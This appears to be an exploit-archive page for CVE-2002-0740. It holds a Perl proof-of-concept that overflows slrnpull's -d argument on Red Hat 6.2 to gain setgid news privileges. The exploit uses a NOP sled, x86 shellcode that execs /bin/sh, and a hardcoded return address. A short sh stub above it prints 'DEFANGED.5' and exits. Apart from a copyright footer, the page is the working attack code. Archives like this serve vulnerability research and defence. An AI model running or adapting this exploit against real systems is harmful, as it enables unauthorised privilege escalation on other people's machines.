# CVE-2002-0740 setuid/setgid緩衝區溢出漏洞
==EXP==
#!/bin/sh
echo DEFANGED.5
exit
#!/usr/bin/perl
#
# Credits for the vulnerability: Alex Hernandez (its setgid news not root)
# The exploit was written by: zillion@snosoft.com / safemode.org
# http://www.safemode.org
# http://www.snosoft.com
#
# Gain setgid news on a Red Hat 6.2 Intel box
$shellcode =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46".
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1".
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
$offset = "-500";
$esp = 0xbfffe2cc;
for ($i = 0; $i < (2041 - (length($shellcode)) - 4); $i++) {
$buffer .= "\x90";
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset));
print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n");
exec("/usr/bin/slrnpull -d '$buffer'");
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容